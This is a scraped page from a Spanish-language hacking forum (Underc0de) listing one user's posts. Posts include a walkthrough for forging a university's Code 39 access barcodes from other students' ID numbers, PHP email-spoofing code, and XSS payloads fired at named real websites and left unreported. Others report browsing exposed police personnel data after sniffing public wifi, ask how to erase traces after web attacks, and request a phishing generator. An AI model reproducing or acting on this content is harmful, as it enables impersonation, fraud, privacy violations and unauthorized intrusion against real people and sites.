white-space: -pre-wrap;
white-space: -o-pre-wrap;
word-wrap: break-word;
overflow: auto;
max-height: 306px;
}
.geshi {
color: #000000;
background: #ffffff;
font-family: monospace;
font-size: 13px;
line-height: 18px;
border: 1px solid #aaaaaa;
margin: 1px auto 1px auto;
width: 99%;
white-space:normal;
white-space: pre;
white-space: pre-wrap;
white-space: -moz-pre-wrap;
white-space: -pre-wrap;
white-space: -o-pre-wrap;
word-wrap: break-word;
overflow: auto;
max-height: 306px;
}

/*  Drafts Modification for SMF 2.0/1.1  */
#drafts-success{color:green; padding:1ex 0 2ex 3ex;}
/*  Drafts Modification for SMF 2.0/1.1  */


.cookie_wrap
{
position: fixed;
width: 100%;
bottom: 20px;
text-align: center;
z-index: 9999;
visibility: hidden;
}
.cookie_wrap a:link, .cookie_wrap a:visited
{
text-decoration: none;
}
.cookie_wrap a:hover
{
text-decoration: underline;
cursor: pointer;
}
.cookie_notice
{
display: inline-block;
margin: 0 auto;
padding: 10px;
border-radius: 5px;
font-size: 12px;
}
#cookie_button
{
background: #346;
color: #fff;
font: bold 11px arial;
padding: 3px 12px;
border-radius: 3px;
}
body { background: #000000;}
}
#14
Hola amigos de Underc0de, esta vez les mostraré un 'hack' que apliqué a mi universidad. "Politécnico Santiago Mariño" o "PSM"

La historia va así. Estudio en una unversidad privada, si no mantienes tus pagos al día, se te niega la entrada a la institución. ¿Como comprueban si estás al día con tus cuotas mensuales? Easy, con códigos de barras plasmados en tu carnet estudiantil o en tu horario de clases.
Luego de hacer un ejercicio de programación relacionado con estos códigos, despertó mucho mi curiosidad acerca de estos, rápidamente recordé que esos códigos se utilizaban en mi facultad y así comencé a investigar que era lo que se escondía tras esos códigos.

Los códigos de barras no son más que una insripción de barras paralelas que contienen información codificada. Estos pueden ser númericos, alfanumericos, simbólicos, etc. Y comúnmente suelen ser revelados por medio de un láser.

           

Algo así es el modelo de mi carnet de estudiante.


Existen diferentes tipos de códigos de barras.
"European Article Numbering (E.A.N.)" Muy común en supermercados y artículos de comercio. 


"CODE 128" puede codificar 128 carácteres ASCII. 

Y muchos más. Pueden seguir los demás en esta monografía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hay información bastante completa acerca de estos códigos.


Me dispuse entonces a saber de cual de todos los tipos se trataba el código de mi carnet estudiantil. El cual era el siguiente.

Ese era el objetivo a descifrar, no tenía números. Cosa que lo hacía más difícil.

Intenté subir la imagen a un lector de código online (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) Pero decía que no encontraba ningún código en la imagen  :-\

Me decidí entonces a realizar la búsqueda de forma visual, observando los diferentes ejemplos en la monografía de antes. Descarté de inmediato los modelos E.A.N, ya que mi código no tiene barras más largas que las del resto.


Mis candidatos eran "Código 39" y "Entrelazado 2 de 5" ya que eran bastante similares a lo que quería descifrar.

Generé entonces un alfabeto para los dos códigos. Utilicé un generador de códigos de barras (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)



Luego de generar el alfabeto, comencé a buscar similitudes entre el alfabeto de Código 39 y el código que yo tenía.



Utilicé algo fuerza bruta manual hasta dar con los dos primeros numeros. '26' Casualmente son los dos primeros números de mi documento de identidad. (Cédula)

Introduje el numero completo y ¡CLARO! Completamente idéntico.



Ya se sabe que el tipo de código que usan es "Code 39" Y que lo que está detrás de el código es el número del documento de identidad. Ahora se puede generar un código, luego imprimirlo y así entrar a la universidad con el código de barras de otra persona, Y bueno, la verdad no es para nada difícil hacerse con un numero de identidad de otro alumno, ya que estos numeros siempre están expuestos en el libro de asistencias que firmamos diariamente. Solo con tomar una foto a una página puedes hacerte con casi 50 números que pueden ser convertidos a códigos.

Aclaro que por supuesto ese no es mi número de identidad  y que muestro esto con fines educativos, no me hago responsable por expulsiones o demás ::)

Saludos a mis colegas de sistemas y a todos ustedes underc0ders!
#15
Dudas y pedidos generales / E-mail Spoofing
Abril 30, 2017, 02:07:55 AM
Hola amigos he estado aprendiendo acerca del E-Mail Spoofing. Vi que la manera más sencilla era hacer un formulario en php y enviarlo con la función mail() El problema es que al momento de enviar no me llega nada a mi correo  :-\ He checkeado el código y no encuentro ningún problema.

Este es el código que llamo a través de un index. Intenté hacerlo sin el index, ejecutando solo el code y tampoco funciona

Código: php
<?php
     
    $correoreceptor = trim($_POST['correof']);
    $asunto = "test";
    $mensaje = 'esto es un test';
    $cabeceras  = 'MIME-Version: 1.0' . "\r\n";
    $cabeceras .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
    $cabeceras .= 'From: email <[email protected]>' . "\r\n";
     
    mail($correoreceptor, $asunto, $mensaje, $cabeceras);
     
     
?>


¿Que puede ser el problema? Gracias de antemano
#16
Hola de nuevo underc0deanos, verán, he escrito un pequeño programa en C++ para buscar una linea de texto en un archivo .txt, lo que hace basicamente es leer línea por línea hasta encontrar la que pedí.

El programa  funciona, lo probé un par de veces y hace lo que quiero. El problema está cuando quiero buscar una línea en archivos grandes. Tengo un log de 5 millones de líneas (casi 700MB) Y pues el programa lleva más de una hora corriendo y, no termina de leer el archivo o encontrar mi petición.

¿Hay alguna forma de mejorar el código para que realice la busqueda de forma más rápida?

Adjunto el code que escribí:

Código: cpp
#include <iostream>
#include <conio.h>
#include <fstream>
using namespace std;

int main(){

cout<<"GO?"<<endl;
getch();

ifstream archivo("log.txt");

char linea[128];
long contador=0;

if(archivo.fail()){
cout<<"ERROR // NOT FOUND"<<endl;
}

else{
while(!archivo.eof()){

archivo.getline(linea,sizeof(linea));

if(linea[0]=='s' && linea[1]=='k' && linea[2]=='u'){
cout<<linea<<endl;
break;
}

}
}
getch();
return 0;
}


De antemano, muchas gracias!
#17
Hacking / Pybelt - Una navaja suiza para pentest
Abril 21, 2017, 12:21:11 AM
Hola Underc0ders, hoy les traigo una pequeña tool dedicada a la auditoría web. Llamada #Pybelt. Creada por Ekultek, Pybelt es una 'navaja suiza' que cuenta con varias características y ellas son:


  • +Escáner de puertos.
  • +Escaner de inyección SQL
  • +Buscador de Dorks
  • +Hash Cracker
  • +Verificador de algoritmo hash
  • +XSS escaner

Su uso es bastante sencillo.



Código: php
pybelt.py -s http://example.com/php?id=2
correra el scanner para SQLi



Código: php

pybelt.py -d filetype:example
empezará a buscar el Dork intrududido en google.



Código: php
pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all
Intentará crackear la hash utilizando todos los algoritmos.

Código: php
pybelt.py -v 9a8b1b7eee229046fc2701b228fc2aff
Verificará de que tipo se trata el hash introducido

Código: php
pybelt.py -f
Buscará proxies disponibles

Código: php
pybelt.py -x http://example.com/php?=id1
buscará vulnearbilidades XSS en la URL



La verdad me parece muy buena bastante completa. Pueden descargar o aportar al codigo en github No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




#18
Saludos. Verán, últimamente he estado manejando archivos algo sensibles y me tiene un poco nervioso la manera en la que los guardo jaja. ¿Hay alguna forma de cifrar,ocultar o proteger archivos y carpetas de forma segura?
Muchas gracias de antemano  ;D

PD: Estoy usando windows.
#19
¡Hola a todos! ¿Hay alguna librería que permita la reproducción de sonidos en C++? No importa los formatos. Solo requiero que mi programa ejecute sonidos.

¡Gracias de antemano!
#20

El presidente ejecutivo de Facebook dijo el lunes que ha completado la creación de su versión de Jarvis, el sistema de inteligencia artificial que Stark utiliza para controlar su casa en las películas de Iron Man.

El Jarvis de Zuckerberg puede hacer cosas como encender y apagar las luces de la casa, reproducir música, reconocer quién está en la puerta y dejar entrar a las personas.

Dijo que uno de los mejores aprendizajes que le dejó el proyecto Jarvis es descifrar el potencial y los límites de la inteligencia artificial (AI, por sus siglas en inglés).



Zuckerberg no es el único que resguarda esta fascinación por la inteligencia artificial. Mucho de lo que su sistema Jarvis puede realizar es similar a lo que Amazon Echo y Google Home son capaces de hacer. Facebook, mientras tanto, ha realizado grandes inversiones en la inteligencia artificial fuera del interés personal de Zuckerberg. La empresa tiene dos grupos de inteligencia artificial: Facebook AI Research (FAIR, por sus siglas en inglés), que tiene unos 75 empleados e intenta servir de mediador entre la comunidad académica; y Applied Machine Learning, que trata de incorporar la inteligencia artificial en los productos de Facebook.

Zuckerberg ha dicho en el pasado que un cuarto de los ingenieros de Facebook están trabajando con inteligencia artificial.

Por ahora, el proyecto Jarvis parece ser más una empresa personal que un producto que Facebook lanzaría al mercado. Sin embargo, Zuckerberg dio pistas de un par de cosas que podría tener a la vista. Por ejemplo, a la hora de hablar con Jarvis, Zuckerberg notó que él y su esposa, Priscilla, hacían pedidos generales como "pon música" en lugar de "pon una canción de Adele". Zuckerberg sugirió que crear un sistema que tenga suficiente conocimiento de contexto para entender estos pedidos podría llenar un vacío en el mercado.



"Ningún producto comercial del que tengo conocimiento hace esto hoy en día, y parece representar una gran oportunidad", escribió en el blog.

En la nota de Mark, redactada en Facebook explica los pasos e inconvenientes que tenía mientras programaba su gran invento.

Fuente:.cnet.com/es/noticias


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#21
Hacking ShowOff / [XSS] kattypulido.com
Noviembre 27, 2016, 03:17:04 AM
¡Hola! Una amiga me pidió que votara por ella en un concurso de modelaje. Luego de hacerle el favor, no podía dejar la web sin inyectar un simple script por curiosidad.



-URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

-Vector: "><script>alert('xsS')</script> || No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

-Reportado: NO.


#22
¡Hola! Tengo algunas preguntas, verán. Luego de realizar un ataque de pentest a nivel web. ¿Que datos/información puede quedar almacenada en el servidor que pueda comprometerme? Y ¿Como es posible eliminar o dejar el menor rastro posible una vez terminado el testeo? Explorando a fondo y haciendo uso de webshells, exploits, etc..

Gracias de antemano!
#23
Hacking ShowOff / "Base de datos" del CICPC
Noviembre 20, 2016, 04:54:56 PM
¡Hola de nuevo! Me encontraba esta mañana en un parque, husmeando un poco el trafico de su wifi libre.

Mientras veía las peticiones DNS una me llamó la atención. "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" el CIPC es "Cuerpo de Investigaciones Científicas, Penales y Criminalísticas" de mi país (Venezuela)
Me pareció extraño que alguien navegue por ese tipo de páginas en una red completamente abierta.

Procedí entonces a buscar y escánear esa página, primero jugué con google un rato hasta que encontré "Index of /txt"


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Lo que me llamó la atención en el sitio eran los .txt y sus nombres. Por ejemplo "AHORROS.txt" y su gran coincidencia con el nombre de la página.

Luego de abrir los archivos, BUM. Información que NO debería ser pública aparece.

Nombres completos, servicios afiliados a la caja de ahorros, disponibilidad de ahorros, deuda del aporte patronal, teléfono, dirección y documento de identidad








He visto antes esto de documentos guardados así por así en otras web. Pero de una de las ramas más importantes del cuerpo policial de Venezuela, no me lo esperaba. Hablamos de miles de líneas de datos personales de detectives/agentes de este cuerpo.
Ahora tengo más razones para quejarme de la ineficiencia de los cuerpos de seguridad en mi país...

Además de toda la información comprometida, hay un log de error muy extenso. No lo logro entender muy bien, no tengo mucha experiencia ahí. Pero los warning al mysql, también despiertan mis alarmas.



Cabe destacar que aún no he reportado nada de todo esto.

#24
Hacking ShowOff / [XSS] romma.fr
Noviembre 13, 2016, 02:49:16 AM



-URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

-Vector: "><script>alert('xsS;')</script> (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

-Reportado: NO.

Se podría decir que es mi primer bug encontrado, al fin jaja. ¿Alguien sabe como puedo contactar a "Admin" para reportar fallos? Si pudieran ayudarme con eso, lo agradecería.
#25
Dudas y pedidos generales / [SOLUCIONADO] XSS con windows
Noviembre 05, 2016, 09:57:42 PM
He estado leyendo e investigando acerca de los ataques XSS y pentesting. El problema es que para practicar necesito linux (actualmente poseo win7) por ejemplo para "Web for pentesters." He estado intentando con Virtual Box. Pero también tengo problemas para correr la máquina virtual.
¿Existe alguna forma de realizar estas tareas utilizando windows?
#26
¿Existe algún generador de phishing/scam? O algún tutorial para crear un phishing de cualquier página web. Gracias de antemano.